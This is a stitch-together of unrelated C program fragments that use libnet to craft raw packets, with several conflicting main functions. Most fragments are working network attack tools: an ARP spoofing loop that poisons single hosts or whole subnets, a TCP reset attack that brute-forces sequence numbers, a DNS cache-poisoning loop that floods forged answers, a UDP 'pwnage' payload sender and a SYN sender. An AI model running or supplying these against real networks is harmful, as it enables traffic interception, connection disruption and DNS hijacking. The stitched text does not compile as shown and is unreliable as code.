// if the target is the gateway itself, we switch to subnet mode,
// otherwise if the target was set, we are in single ip spoofing mode.
if( target_ip != 0 && target_ip != gateway_ip )
{
if( target_ip != 0 && arp_lookup( target_ip, &target_mac, iface ) != 0 )
{
printf( "[ERROR] Couldn't find a cached MAC address for %s, try to wait a little bit and then try again or restart the network discovery.\n", libnet_addr2name4(target_ip, LIBNET_DONT_RESOLVE) );
return 1;
}
printf( "\nSingle target mode.\n" );
while( killed == 0 )
{
arp_send( lnet, ARPOP_REPLY, (unsigned char *)our_mac, gateway_ip, (unsigned char *)&target_mac, target_ip );
sleep(1);
}
}
// whole network spoofing
else
{
printf( "\nSubnet mode.\n" );
netmap = net_get_mapping( iface, nhosts, ifaddr, netmask, gateway_ip, &i );
if( i == 0 )
{
printf( "[ERROR] No alive endpoints found.\n" );
return 1;
}
while( killed == 0 )
{
for( i = 1; i <= nhosts && killed == 0; i++ )
{
target_ip = ( ifaddr & netmask ) | htonl(i);
entry = hashmapGet( netmap, (void *)target_ip );
if( entry && killed == 0 )
{
arp_send( lnet, ARPOP_REPLY, (unsigned char *)our_mac, gateway_ip, (unsigned char *)&entry->mac, target_ip );
}
}
sleep(1);
}
}
return 0;
}
int main(int argc, char **argv)
{
char errbuf[LIBNET_ERRBUF_SIZE];
libnet_t *l;
int c;
u_char *buf;
int packet_len = 0;
struct ip *IP;
struct udphdr *UDP;
u_int32_t src = 0, dst = 0;
banner();
if (argc < 3) usage(argv[0]);
if ((l = libnet_init(LIBNET_RAW4, NULL, errbuf)) == NULL) {
fprintf(stderr, "[!] libnet_init() failed: %s", errbuf);
exit(-1);
}
if ((src = libnet_name2addr4(l, argv[1], LIBNET_RESOLVE)) == -1) {
fprintf(stderr, "[!] Unresolved source address.\n");
exit(-1);
}
if ((dst = libnet_name2addr4(l, argv[2], LIBNET_RESOLVE)) == -1) {
fprintf(stderr, "[!] Unresolved destination address.\n");
exit(-1);
}
if ((buf = malloc(IP_MAXPACKET)) == NULL) {
perror("malloc");
exit(-1);
}
UDP = (struct udphdr *)(buf + LIBNET_IPV4_H);
packet_len = LIBNET_IPV4_H + LIBNET_UDP_H + sizeof(pwnage) - 1;
srand(time(NULL));
IP = (struct ip *) buf;
IP->ip_v = 4; /* version 4 */
IP->ip_hl = 5; /* header length */
IP->ip_tos = 0; /* IP tos */
IP->ip_len = htons(packet_len); /* total length */
IP->ip_id = rand(); /* IP ID */
IP->ip_off = htons(0); /* fragmentation flags */
IP->ip_ttl = 64; /* time to live */
IP->ip_p = IPPROTO_UDP; /* transport protocol */
IP->ip_sum = 0;
IP->ip_src.s_addr = src;
IP->ip_dst.s_addr = dst;
UDP->uh_sport = rand();
UDP->uh_dport = (argc > 3) ? htons((u_short)atoi(argv[3])) : htons(161);
UDP->uh_ulen = htons(LIBNET_UDP_H + sizeof(pwnage) - 1);
UDP->uh_sum = 0;
memcpy(buf + LIBNET_IPV4_H + LIBNET_UDP_H, pwnage, sizeof(pwnage) - 1);
libnet_do_checksum(l, (u_int8_t *)buf, IPPROTO_UDP, packet_len - LIBNET_IPV4_H);
if ((c = libnet_write_raw_ipv4(l, buf, packet_len)) == -1)
{
fprintf(stderr, "[!] Write error: %s\n", libnet_geterror(l));
exit(-1);
}
printf("[+] Packet sent.\n");
libnet_destroy(l);
free(buf);
return (0);
}
int main(int argc, char *argv[])
{
unsigned int port;
int opt;
unsigned long delay;
pid_t pid;
char *interface, *endptr;
char libnet_ebuf[LIBNET_ERRBUF_SIZE];
pcap_t *pcap;
char pcap_expr[100];
libnet_t *libnet;
u_int32_t target_addr, source_addr;
struct sigaction sa;
interface = NULL;
while ((opt = getopt(argc, argv, "i:")) != -1) {
switch (opt) {
case 'i':
interface = optarg;
break;
default:
usage();
break;
}
}
argc -= optind;
argv += optind;
if (argc != 3) {
usage();
}
port = strtoul(argv[1], &endptr, 10);
if ((*endptr != '\0') || port < 1 || port > 65535) {
errx(1, "Invalid port: %s", argv[1]);
}
errno = 0;
delay = strtoul(argv[2], &endptr, 10);
if (*endptr != '\0') {
errx(1, "invalid delay: %s", argv[2]);
} else if ((errno == ERANGE &&
(delay == LONG_MAX)) ||
(errno != 0 && delay == 0)) {
errx(1, "invalid delay (%s): %s", strerror(errno), argv[2]);
}
/* Initialize libnet */
if ((libnet = libnet_init(LIBNET_RAW4, interface, libnet_ebuf)) == NULL) {
errx(1, "couldn't initialize libnet: %s", libnet_ebuf);
}
if ((target_addr = libnet_name2addr4(libnet, argv[0], LIBNET_RESOLVE)) == -1) {
errx(1, "could not resolve target %s", argv[0]);
}
if ((source_addr = libnet_get_ipaddr4(libnet)) == -1) {
errx(1, "could not get local IP: %s", libnet_ebuf);
}
/* Initialize pcap */
snprintf(pcap_expr, 99, "tcp and tcp[tcpflags] == 18 and src host %s and port %s",
argv[0], argv[1]);
if ((pcap = pcap_init(interface, pcap_expr, 64)) == NULL)
errx(1, "couldn't initialize sniffing");
if ((pcap_off = pcap_dloff(pcap)) < 0)
errx(1, "couldn't determine link layer offset");
/* Fork */
pid = fork();
if (pid == -1)
errx(1, "fork failed");
else if (pid == 0)
send_syns(libnet, source_addr, target_addr, port, delay);
else {
child_pid = pid;
sa.sa_handler = &handle_signal;
sigaction(SIGINT, &sa, NULL);
sigaction(SIGQUIT, &sa, NULL);
sigaction(SIGTERM, &sa, NULL);
send_acks(pcap, libnet);
}
return EXIT_SUCCESS;
}
void frag_and_send(u_int8_t *payload, u_int32_t total_pload_size) {
/* Builds and sends the first packet, calling get_sum() to
* * get the correct checksum for the ICMP packet (with the
* * whole payload). Then builds and sends IP fragments
* * until all the payload is sent. */
char ip_addr_str[16];
u_int32_t ip_addr, src_addr;
u_int16_t id, seq, ip_id;
/* hdr_offset = fragmentation flags + offset (in bytes)
* * divided by 8 */
int pload_offset, hdr_offset;
int bytes_written, max_pload_size, packet_pload_size;
libnet_ptag_t ip_tag;
/* Generating random IDs */
id = (u_int16_t)libnet_get_prand(LIBNET_PR16);
/* We need a non-zero id number for the IP headers,
* * otherwise libnet will increase it after each
* * build_ipv4, breaking the fragments */
ip_id = (u_int16_t)libnet_get_prand(LIBNET_PR16);
seq = 1;
/* Getting IP addresses */
src_addr = libnet_get_ipaddr4(l);
if (src_addr == -1) {
fprintf(stderr, "Couldn't get own IP address: %s\n", libnet_geterror(l));
libnet_destroy(l);
exit(EXIT_FAILURE);
}
printf("Destination IP address: ");
scanf("%15s", ip_addr_str);
ip_addr = libnet_name2addr4(l, ip_addr_str, LIBNET_DONT_RESOLVE);
if (ip_addr == -1) {
fprintf(stderr, "Error converting IP address.\n");
libnet_destroy(l);
exit(EXIT_FAILURE);
}
/* Getting max payload size */
max_pload_size = (MTU - LIBNET_IPV4_H);
/* making it a multiple of 8 */
max_pload_size -= (max_pload_size % 8);
pload_offset = 0;
/* Building the first packet, which carries the ICMP
* * header */
/* We're doing (payload size - icmp header size) and not
* * checking if it's a multiple of 8 because we know the
* * header is 8 bytes long */
if (total_pload_size > (max_pload_size - LIBNET_ICMPV4_ECHO_H)) {
hdr_offset = IP_MF;
packet_pload_size = max_pload_size - LIBNET_ICMPV4_ECHO_H;
} else {
hdr_offset = 0;
packet_pload_size = total_pload_size;
}
/* ICMP header */
if (libnet_build_icmpv4_echo(ICMP_ECHO, 0,
get_sum(payload, total_pload_size, id, seq), id,
seq, payload, packet_pload_size, l, 0) == -1) {
fprintf(stderr, "Error building ICMP header: %s\n", libnet_geterror(l));
libnet_destroy(l);
exit(EXIT_FAILURE);
}
/* First IP header (no payload, offset == 0) */
if (libnet_build_ipv4(
(LIBNET_IPV4_H + LIBNET_ICMPV4_ECHO_H + packet_pload_size), 0, ip_id,
hdr_offset, 255, IPPROTO_ICMP, 0, src_addr, ip_addr, NULL, 0, l,
0) == -1) {
fprintf(stderr, "Error building IP header: %s\n", libnet_geterror(l));
libnet_destroy(l);
exit(EXIT_FAILURE);
}
/* Writing packet */
bytes_written = libnet_write(l);
if (bytes_written != -1)
printf("%d bytes written.\n", bytes_written);
else
fprintf(stderr, "Error writing packet: %s\n", libnet_geterror(l));
/* Updating the offset */
pload_offset += packet_pload_size;
/* Clearing */
/* We need to get rid of the ICMP header to build the
* * other fragments */
libnet_clear_packet(l);
ip_tag = LIBNET_PTAG_INITIALIZER;
/* Looping until all the payload is sent */
while (total_pload_size > pload_offset) {
/* Building IP header */
/* checking if there will be more fragments */
if ((total_pload_size - pload_offset) > max_pload_size) {
/* In IP's eyes, the ICMP header in the first packet
* needs to be in the offset, so we add its size to
* the payload offset here */
hdr_offset = IP_MF + (pload_offset + LIBNET_ICMPV4_ECHO_H) / 8;
packet_pload_size = max_pload_size;
} else {
/* See above */
hdr_offset = (pload_offset + LIBNET_ICMPV4_ECHO_H) / 8;
packet_pload_size = total_pload_size - pload_offset;
}
ip_tag = libnet_build_ipv4((LIBNET_IPV4_H + max_pload_size), 0, ip_id,
hdr_offset, 255, IPPROTO_ICMP, 0, src_addr,
ip_addr, (payload + pload_offset),
packet_pload_size, l, ip_tag);
if (ip_tag == -1) {
fprintf(stderr, "Error building IP header: %s\n", libnet_geterror(l));
libnet_destroy(l);
exit(EXIT_FAILURE);
}
/* Writing packet */
bytes_written = libnet_write(l);
if (bytes_written != -1)
printf("%d bytes written.\n", bytes_written);
else
fprintf(stderr, "Error writing packet: %s\n", libnet_geterror(l));
/* Updating the offset */
pload_offset += packet_pload_size;
}
}
int main(int argc, char **argv)
{
char *srv_addr;
char *srv_port;
char *cli_addr;
char *cli_port;
libnet_t *attack;
u_int32_t srv_ip_addr, cli_ip_addr, seq_num;
libnet_ptag_t ip_tag, tcp_tag;
char *error_msg = "Error";
if(argc >= 2) {
cli_addr = argv[1];
} else {
cli_addr = "127.0.0.1";
}
if(argc >= 3) {
cli_port = argv[2];
} else {
cli_port = "10001";
}
if (argc >= 4) {
srv_addr = argv[3];
} else {
srv_addr = "127.0.0.1";
}
if (argc >= 5) {
srv_port = argv[4];
}
else {
srv_port = "9999";
}
seq_num = 1200000000;
ip_tag=0;
tcp_tag=0;
attack = libnet_init(LIBNET_RAW4, srv_addr, error_msg); // 2nd parameter device may have to be changed
srv_ip_addr = libnet_name2addr4(attack, srv_addr, LIBNET_DONT_RESOLVE);
cli_ip_addr = libnet_name2addr4(attack, cli_addr, LIBNET_DONT_RESOLVE);
//atoi(cli_port);
//atoi(srv_port);
libnet_build_tcp( atoi(cli_port), /* src port */ //problem
atoi(srv_port), /* destination port */ //problem
seq_num, /* sequence number */
0, /* acknowledgement */
TH_RST, /* control flags */
7, /* window */
0, /* checksum - 0 = autofill */
0, /* urgent */
LIBNET_TCP_H, /* header length */
NULL, /* payload */
0, /* payload length */
attack, /* libnet context */
tcp_tag); /* protocol tag */
libnet_build_ipv4(LIBNET_TCP_H + LIBNET_IPV4_H, /* length */
0, /* TOS */
libnet_get_prand (LIBNET_PRu16), /* IP ID */
0, /* frag offset */
127, /* TTL */
IPPROTO_TCP, /* upper layer protocol */
0, /* checksum, 0=autofill */
cli_ip_addr, /* src IP */
srv_ip_addr, /* dest IP */
NULL, /* payload */
0, /* payload len */
attack, /* libnet context */
ip_tag); /* protocol tag */
printf("starting reset attack on TCP connection: client %s:%s, server %s:%s\n",
cli_addr, cli_port, srv_addr, srv_port);
printf("Libnet value: %d: %u\nServer Port: %s\nClient Port: %s", libnet_write(attack), seq_num, srv_port, cli_port);
//libnet_write(attack)
libnet_destroy(attack);
for(seq_num = (1200000000-16384); seq_num>0; seq_num=(seq_num-16384))
{
attack = libnet_init(LIBNET_RAW4, srv_addr, error_msg); // 2nd parameter device may have to be changed
libnet_build_tcp(atoi(cli_port), atoi(srv_port), seq_num,
0, TH_RST, 7,0, 0, LIBNET_TCP_H, NULL, 0, attack, tcp_tag);
libnet_build_ipv4(LIBNET_TCP_H + LIBNET_IPV4_H, 0, libnet_get_prand (LIBNET_PRu16), 0, 127, IPPROTO_TCP,
0, cli_ip_addr, srv_ip_addr, NULL, 0, attack, ip_tag);
//libnet_write(attack);
//printf("Libnet value: %d: %d\n", libnet_write(attack), seq_num);
libnet_write(attack);
libnet_destroy(attack);
}
printf("Test3"); //attack successful
//libnet_destroy(attack);
return 0;
}
int
main(int argc, char *argv[])
{
/*
* Initialize the library. Root priviledges are required.
*/
l = libnet_init(
LIBNET_LINK, /* injection type */
// NULL, /* network interface eth0, eth1, etc. NULL is default.*/
"eth11", /* network interface eth0, eth1, etc. NULL is default.*/
errbuf); /* error buffer */
if (l == NULL)
{
fprintf(stderr, "libnet_init() failed: %s", errbuf);
exit(EXIT_FAILURE);
}
/* src_ip = 0;
dst_ip = 0;
src_prt = 0;
dst_prt = 0;
payload = NULL;
payload_s = 0;
*/
while ((c = getopt (argc, argv, "p:t:i:e:")) != EOF)
{
switch (c)
{
case 'p':
strcpy(payload_file, optarg);
break;
case 't':
strcpy(tcp_file, optarg);
break;
case 'i':
strcpy(ip_file, optarg);
break;
case 'e':
strcpy(eth_file, optarg);
break;
default:
break;
}
}
if (optind != 9)
{
usage();
exit(0);
}
i_dns_bind2_addr = libnet_name2addr4(l, dns_bind2_addr, LIBNET_RESOLVE);
sscanf("08, 00, 27, 90, 31, 81", "%x, %x, %x, %x, %x, %x", &res_eth_saddr[0], &res_eth_saddr[1], &res_eth_saddr[2], &res_eth_saddr[3], &res_eth_saddr[4], &res_eth_saddr[5]);
srand((int)time(0));
int loop_counter = 0;
while (1==1) {
int randomNumber = (rand()%10000000);
while (randomNumber<1000000) randomNumber*=10;
sprintf(random_host, ".x-%d.%s", randomNumber,attack_domain);
printf("\nNow attacking with domain %s \n",random_host);
convertDomain();
// load_payload();
load_payload_query(); // get the new payload with random subdomain
load_ethernet();
load_tcp_udp();
load_ip();
convert_proto();
if(ip_proto_val==IPPROTO_TCP){
t = libnet_build_tcp(
t_src_port, /* source port */
t_des_port, /* destination port */
t_seq, /* sequence number */
t_ack, /* acknowledgement num */
t_control_val, /* control flags */
t_win, /* window size */
0, /* checksum */
t_urgent, /* urgent pointer */
LIBNET_TCP_H + payload_filesize, /* TCP packet size */
payload_location, /* payload */
payload_filesize, /* payload size */
l, /* libnet handle */
0); /* libnet id */
head_type = LIBNET_TCP_H;
if (t == -1)
{
fprintf(stderr, "Can't build TCP header: %s\n", libnet_geterror(l));
goto bad;
}
}
if(ip_proto_val==IPPROTO_UDP){
t = libnet_build_udp(
t_src_port, /* source port */
t_des_port, /* destination port */
LIBNET_UDP_H + payload_filesize, /* packet length */
0, /* checksum */
payload_location, /* payload */
payload_filesize, /* payload size */
l, /* libnet handle */
0); /* libnet id */
head_type = LIBNET_UDP_H;
if (t == -1)
{
fprintf(stderr, "Can't build UDP header: %s\n", libnet_geterror(l));
goto bad;
}
}
t = libnet_build_ipv4(
/* LIBNET_IPV4_H + LIBNET_TCP_H + 20 + payload_s, length */
LIBNET_IPV4_H + head_type + payload_filesize, /* length */
i_ttos_val, /* TOS */
i_id, /* IP ID */
i_frag, /* IP Frag */
i_ttl, /* TTL */
ip_proto_val, /* protocol */
0, /* checksum */
i_src_addr, /* source IP */
i_des_addr, /* destination IP */
NULL, /* payload */
0, /* payload size */
l, /* libnet handle */
0); /* libnet id */
if (t == -1)
{
fprintf(stderr, "Can't build IP header: %s\n", libnet_geterror(l));
goto bad;
}
t = libnet_build_ethernet(
eth_daddr, /* ethernet destination */
eth_saddr, /* ethernet source */
e_proto_val, /* protocol type */
NULL, /* payload */
0, /* payload size */
l, /* libnet handle */
0); /* libnet id */
if (t == -1)
{
fprintf(stderr, "Can't build ethernet header: %s\n", libnet_geterror(l));
goto bad;
}
/*
* Write it to the wire.
*/
c = libnet_write(l);
// sending the request to the DNS server
free(payload_location);
libnet_destroy(l);
// reinit the handle so that we can set new parameters to the handle.
for (i=0;i<10000;i++) { // loop to send 10000 responses for each request.
l = libnet_init(
LIBNET_LINK, /* injection type */
// NULL, /* network interface eth0, eth1, etc. NULL is default.*/
"eth11", /* network interface eth0, eth1, etc. NULL is default.*/
errbuf); /* error buffer */
// reinit the handle for sending responses
if (l == NULL)
{
fprintf(stderr, "libnet_init() failed: %s", errbuf);
exit(EXIT_FAILURE);
}
load_payload_answer();
// generate the response and send it
// change the ports of source port and destination port to match the second DNS query
if(ip_proto_val==IPPROTO_UDP){
t = libnet_build_udp(
t_des_port, /* source port */
t_src_port, /* destination port */
LIBNET_UDP_H + payload_filesize, /* packet length */
0, /* checksum */
payload_location, /* payload */
payload_filesize, /* payload size */
l, /* libnet handle */
0); /* libnet id */
head_type = LIBNET_UDP_H;
if (t == -1)
{
fprintf(stderr, "Can't build UDP header: %s\n", libnet_geterror(l));
goto bad;
}
}
// change the ethernet headers to match the response from the second DNS server
t = libnet_build_ipv4(
/* LIBNET_IPV4_H + LIBNET_TCP_H + 20 + payload_s, length */
LIBNET_IPV4_H + head_type + payload_filesize, /* length */
i_ttos_val, /* TOS */
i_id, /* IP ID */
i_frag, /* IP Frag */
i_ttl, /* TTL */
ip_proto_val, /* protocol */
0, /* checksum */
i_dns_bind2_addr, /* source IP */
i_des_addr, /* destination IP */
NULL, /* payload */
0, /* payload size */
l, /* libnet handle */
0); /* libnet id */
if (t == -1)
{
fprintf(stderr, "Can't build IP header: %s\n", libnet_geterror(l));
goto bad;
}
t = libnet_build_ethernet(
eth_daddr, /* ethernet destination */
res_eth_saddr, /* ethernet source */
e_proto_val, /* protocol type */
NULL, /* payload */
0, /* payload size */
l, /* libnet handle */
0); /* libnet id */
if (t == -1)
{
fprintf(stderr, "Can't build ethernet header: %s\n", libnet_geterror(l));
goto bad;
}
/*
* Write it to the wire.
*/
c = libnet_write(l);
printf("**** %d packets sent **** (packetsize: %d bytes each)\n",eth_pktcount,c); /* tell them what we just did */
free(payload_location);
libnet_destroy(l);
}
l = libnet_init(
LIBNET_LINK, /* injection type */
// NULL, /* network interface eth0, eth1, etc. NULL is default.*/
"eth11", /* network interface eth0, eth1, etc. NULL is default.*/
errbuf); /* error buffer */
if (l == NULL)
{
fprintf(stderr, "libnet_init() failed: %s", errbuf);
exit(EXIT_FAILURE);
}
loop_counter++;
printf("%d\n", loop_counter);
if(loop_counter == 2){
break;
}
// loop to do for multiple unique requests
}
/* give the buf memory back */
// clear memory
libnet_destroy(l);
return 0;
bad:
libnet_destroy(l);
return (EXIT_FAILURE);
// clear memory on failure
}
void sendsyns ()
{
libnet_t *l;
char errbuf[LIBNET_ERRBUF_SIZE];
u_long ip;
libnet_ptag_t tcp_pkt = LIBNET_PTAG_INITIALIZER;
libnet_ptag_t ip_pkt;
u_long dst_ip;
int count = 0;
char *payload = ""; // put your love note here.
u_short payload_s = strlen (payload);
int currentport = opts.low_port;
int build_header = 1;
/*
* pcap may be slow to initialize, so let's wait a second.
*/
sleep (1);
/*
* initialize libnet for raw IP packets. libnet will
* find an appropriate interface.
*/
l = libnet_init (LIBNET_RAW4, NULL, errbuf);
if (l == NULL) {
fprintf (stderr, "libnet_init failed: %s", errbuf);
exit (1);
}
/*
* get the IP address of the source interface
*/
ip = libnet_get_ipaddr4 (l);
if (-1 == ip) {
fprintf (stderr, "libnet_get_ipaddr4(l) failed: ");
fprintf (stderr, "%s\n", libnet_geterror (l));
exit (1);
}
dst_ip = libnet_name2addr4 (l, (u_char *) opts.target, LIBNET_RESOLVE);
if (-1 == dst_ip) {
fprintf (stderr, "libnet_name2addr4() failed: ");
fprintf (stderr, "%s\n", libnet_geterror (l));
exit (1);
}
/*
* Build and send a SYN packet, one for each port. The first time
* this loop is executed an IP packet will be constructed.
*/
printf ("scanning port %d through %d on %s\n",
opts.low_port,
opts.high_port, libnet_addr2name4 (dst_ip, LIBNET_DONT_RESOLVE));
while (currentport <= opts.high_port) {
/*
* Sleep a little... if we send packets too fast, some will get
* dropped.
*/
usleep (50);
/*
* Build the TCP packet with the SYN flag set. A payload is
* optional; for automated scans it is nice to include some text
* explaining why you are scanning (or ask first!). Fields with
* 0 will be calculated by libnet.
*/
tcp_pkt = libnet_build_tcp (opts.src_port, // source port
currentport++, // dest port
libnet_get_prand (LIBNET_PRu32), // seq
libnet_get_prand (LIBNET_PRu32), // ack
TH_SYN, // flags
libnet_get_prand (LIBNET_PRu16), // window size
0, // checksum
0, // urgent ptr
LIBNET_TCP_H + payload_s, // packet size
(u_char *) payload, // contents of packet
payload_s, // size of payload
l, // libnet handle
tcp_pkt); // libnet id
if (-1 == tcp_pkt) {
fprintf (stderr, "libnet_build_tcp() failed: ");
fprintf (stderr, "%s\n", libnet_geterror (l));
exit (1);
}
if (build_header) {
build_header = 0;
ip_pkt = libnet_autobuild_ipv4 (LIBNET_IPV4_H + LIBNET_TCP_H,
IPPROTO_TCP, dst_ip, l);
if (-1 == ip_pkt) {
fprintf (stderr, "libnet_autobuild_ipv4() failed: ");
fprintf (stderr, "%s\n", libnet_geterror (l));
}
}
/*
* Send it!
*/
count = libnet_write (l);
if (-1 == count) {
fprintf (stderr, "libnet_write() failed: ");
fprintf (stderr, "%s\n", libnet_geterror (l));
}
}
printf ("\n");
}
int
main(int argc, char *argv[])
{
int c = -1;
char errbuf[LIBNET_ERRBUF_SIZE];
char* device;
char* ipaddr;
char* macaddr;
char* broadcast;
char* netmask;
u_int32_t ip;
u_char src_mac[6];
LTYPE* l;
int repeatcount = 1;
int j;
long msinterval = 1000;
int flag;
char pidfilenamebuf[64];
char *pidfilename = NULL;
CL_SIGNAL(SIGTERM, byebye);
CL_SIGINTERRUPT(SIGTERM, 1);
cl_log_set_entity(SENDARPNAME);
cl_log_enable_stderr(TRUE);
cl_log_set_facility(LOG_USER);
cl_inherit_logging_environment(0);
while ((flag = getopt(argc, argv, "i:r:p:")) != EOF) {
switch(flag) {
case 'i': msinterval= atol(optarg);
break;
case 'r': repeatcount= atoi(optarg);
break;
case 'p': pidfilename= optarg;
break;
default: fprintf(stderr, "%s\n\n", print_usage);
return 1;
break;
}
}
if (argc-optind != 5) {
fprintf(stderr, "%s\n\n", print_usage);
return 1;
}
/*
* argv[optind+1] DEVICE dc0,eth0:0,hme0:0,
* argv[optind+2] IP 192.168.195.186
* argv[optind+3] MAC ADDR 00a0cc34a878
* argv[optind+4] BROADCAST 192.168.195.186
* argv[optind+5] NETMASK ffffffffffff
*/
device = argv[optind];
ipaddr = argv[optind+1];
macaddr = argv[optind+2];
broadcast = argv[optind+3];
netmask = argv[optind+4];
if (!pidfilename) {
if (snprintf(pidfilenamebuf, sizeof(pidfilenamebuf), "%s%s",
PIDFILE_BASE, ipaddr) >=
(int)sizeof(pidfilenamebuf)) {
cl_log(LOG_INFO, "Pid file truncated");
return EXIT_FAILURE;
}
pidfilename = pidfilenamebuf;
}
if(write_pid_file(pidfilename) < 0) {
return EXIT_FAILURE;
}
#if defined(HAVE_LIBNET_1_0_API)
#ifdef ON_DARWIN
if ((ip = libnet_name_resolve((unsigned char*)ipaddr, 1)) == -1UL) {
#else
if ((ip = libnet_name_resolve(ipaddr, 1)) == -1UL) {
#endif
cl_log(LOG_ERR, "Cannot resolve IP address [%s]", ipaddr);
unlink(pidfilename);
return EXIT_FAILURE;
}
l = libnet_open_link_interface(device, errbuf);
if (!l) {
cl_log(LOG_ERR, "libnet_open_link_interface on %s: %s"
, device, errbuf);
unlink(pidfilename);
return EXIT_FAILURE;
}
#elif defined(HAVE_LIBNET_1_1_API)
if ((l=libnet_init(LIBNET_LINK, device, errbuf)) == NULL) {
cl_log(LOG_ERR, "libnet_init failure on %s: %s", device, errbuf);
unlink(pidfilename);
return EXIT_FAILURE;
}
if ((signed)(ip = libnet_name2addr4(l, ipaddr, 1)) == -1) {
cl_log(LOG_ERR, "Cannot resolve IP address [%s]", ipaddr);
unlink(pidfilename);
return EXIT_FAILURE;
}
#else
# error "Must have LIBNET API version defined."
#endif
if (!strcasecmp(macaddr, AUTO_MAC_ADDR)) {
if (get_hw_addr(device, src_mac) < 0) {
cl_log(LOG_ERR, "Cannot find mac address for %s",
device);
unlink(pidfilename);
return EXIT_FAILURE;
}
}
else {
convert_macaddr((unsigned char *)macaddr, src_mac);
}
/*
* We need to send both a broadcast ARP request as well as the ARP response we
* were already sending. All the interesting research work for this fix was
* done by Masaki Hasegawa <*****@*****.**> and his colleagues.
*/
for (j=0; j < repeatcount; ++j) {
c = send_arp(l, ip, (unsigned char*)device, src_mac
, (unsigned char*)broadcast, (unsigned char*)netmask
, ARPOP_REQUEST);
if (c < 0) {
break;
}
mssleep(msinterval / 2);
c = send_arp(l, ip, (unsigned char*)device, src_mac
, (unsigned char *)broadcast
, (unsigned char *)netmask, ARPOP_REPLY);
if (c < 0) {
break;
}
if (j != repeatcount-1) {
mssleep(msinterval / 2);
}
}
unlink(pidfilename);
return c < 0 ? EXIT_FAILURE : EXIT_SUCCESS;
}
void
convert_macaddr (u_char *macaddr, u_char enet_src[6])
{
int i, pos;
u_char bits[3];
pos = 0;
for (i = 0; i < 6; i++) {
/* Inserted to allow old-style MAC addresses */
if (*macaddr == ':') {
pos++;
}
bits[0] = macaddr[pos++];
bits[1] = macaddr[pos++];
bits[2] = '\0';
enet_src[i] = strtol((const char *)bits, (char **)NULL, 16);
}
}